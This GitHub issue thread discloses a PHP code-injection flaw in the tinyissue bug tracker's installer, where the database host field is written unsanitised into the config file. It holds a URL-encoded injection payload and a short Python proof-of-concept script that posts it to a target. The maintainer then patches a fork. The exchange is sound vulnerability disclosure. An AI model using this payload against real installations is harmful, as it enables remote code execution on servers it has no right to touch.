Skip to content
This repository has been archived by the owner on May 9, 2021. It is now read-only.

There is a security problem that can getshell #237

Closed
MrFk opened this issue Feb 20, 2019 · 32 comments
Closed

There is a security problem that can getshell #237

MrFk opened this issue Feb 20, 2019 · 32 comments

Comments

@MrFk
Copy link

MrFk commented Feb 20, 2019

problem file at install/config-setup.php line 13

$config_file = str_replace('localhost', $_POST['database_host'], $config_file);

cause a security problem that can getshell

poc:

POST /install/config-setup.php

datas:create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

finally,at the config.app.php, you can the phpinfo();

image

Thank you very much

@Patriboom
Copy link

What is your suggestion ?

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

after the install.php,delete config-setup.php by the php code

@Patriboom
Copy link

This already works, and many more features are availables on the following fork: https://github.com/pixeline/bugs/issues

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

But it didn't delete the file on my computer,is there anything wrong with it?

@Patriboom
Copy link

No.
The system is supposed to check if the config file exists. If so, the system launches the application.
If no, it launches the installation.
Doesn't matter if the installation file is not deleted. If the system finds the config file, the installation file will never be launched anymore.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

But finish the install,the config.app.example still exists,and you need to delete the config.app.example after the installation by the php-code.

@Patriboom
Copy link

Patriboom commented Feb 20, 2019

No.
You don't need to delete the file.
It can stay there as « backup » since it will never be red anymore by the system.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

but i can cause a security proble

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

image
it shouldn't be delete by the people but by the code

@Patriboom
Copy link

Patriboom commented Feb 20, 2019

That's solved in more recent forks like the one I mentionned before.
The actual Mikelbring/tinyissue is very old. Last update SIX YEARS ago!!!
I suggest you to use a more recent fork.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

no, https://github.com/pixeline/bugs also exists this problem,look at this

image

@Patriboom
Copy link

The same code. I know.
But, it doesn't ask you to delete any file after a complete install process.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

So it is a security problem by default setting.It should be delete or rename the install file after the installation by the install program.

@Patriboom
Copy link

Where do you get such screenshots from ?
I would like to repeat the same test as you do.

@Patriboom
Copy link

Please explain better the issue you've found.
What can create such « miss coding » about you ?

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

I build the environment on my computer.
I escaped the Array in config.app.example.php.

PostData is '),'a'=>var_dump(phpinfo()))?>

@Patriboom
Copy link

Patriboom commented Feb 20, 2019

For sure, with any open source code, you can change the code and force it to do something which has not been planned by the initial project.
Is the original code exposes users to any threat ?
If so, which ? and how ?

Your initial sentence was:

cause a security problem that can getshell

What is "getshell" ?

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

"Getshell" means remote command execute,an attacker can execute command on your service

@Patriboom
Copy link

Ok.
Now, how the code permits that ?
Don't say « the hacker can changes the code ». If he can, he doesn't need the code to hack the computer, it's already hacked.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

the hacker just need to repeat my postdata create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E like this,the attacker can execute any code if he liked

@Patriboom
Copy link

If, and only if the attacker

  1. Get access to the computer
  2. know the exact name and address of the specific page config-setup.php
    If hacker has it, he doesn't need config-setup.php as tool to go further; he is already in the machine and does whatever he wants.
    Where, when and how do you submit such postdata ?

Or maybe you put the create_config= in the install page's field.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

Yeah,by the default setting,hacker can access the install/config-setup.php easily.

@Patriboom
Copy link

I tried you code

create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

replacing "localhost" in the install form.

I got an error from system, not any kind of phpinfo() page.

@Patriboom
Copy link

Next, I'll try to replace the "create_config" value with your code.

@Patriboom
Copy link

Doing so: nothing like a phpinfo() again.

@Patriboom
Copy link

Yeah,by the default setting,hacker can access the install/config-setup.php easily.

I would like to help people to avoid that. But I'm still unable to redo what you're doing.
May you explain me step by step, please.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

ok,i'll show you the code in a minutes

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

import requests

def attack(url):

    datas = {
        'create_config':'123',
        'database_host':"'),'a'=>var_dump(phpinfo()))?>"
    }

    attack_url = '{0}/bugs/install/config-setup.php'.format(url)

    res = requests.post(attack_url,data=datas)

    print res.content


if __name__=='__main__':
    #edit your url here
    attack('http://192.168.2.147')

the code using python 2.7,you just need to edit the url

@Patriboom
Copy link

Nice.
Big thanks.
The fork will be updated today.

@Patriboom
Copy link

https://github.com/pixeline/bugs 's install now delete de config file.

@MrFk
Copy link
Author

MrFk commented Feb 20, 2019

it's okay.

@Patriboom
Copy link

For any further suggestion, please comment on https://github.com/pixeline/bugs

@MrFk MrFk closed this as completed Mar 4, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants